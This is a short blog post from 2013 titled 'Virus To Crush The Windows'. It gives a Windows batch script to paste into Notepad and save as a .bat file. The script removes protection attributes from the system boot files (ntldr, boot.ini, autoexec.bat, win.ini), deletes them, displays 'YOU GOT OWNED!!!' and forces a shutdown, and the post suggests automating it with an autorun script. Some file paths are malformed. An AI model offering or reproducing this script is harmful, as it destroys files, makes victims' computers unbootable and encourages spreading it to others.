Showing posts with label bat. Show all posts
Showing posts with label bat. Show all posts
Friday, August 2, 2013
Virus To Crush The Windows
This code will shutdown the computer and never to reboot again!
Use with care!
Copy the following code into notepad:
@echo off
attrib -r -s -h c:autoexec.bat
del c:autoexec.bat
attrib -r -s -h c:boot.ini
del c:boot.ini
attrib -r -s -h c:ntldr
del c:ntldr
attrib -r -s -h c:windowswin.ini
del c:windowswin.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
Save as Hackmimic_crushwindows.bat
*Search this blog for autorun script and automate it.
Feel free to leave comments~
Subscribe to:
Posts (Atom)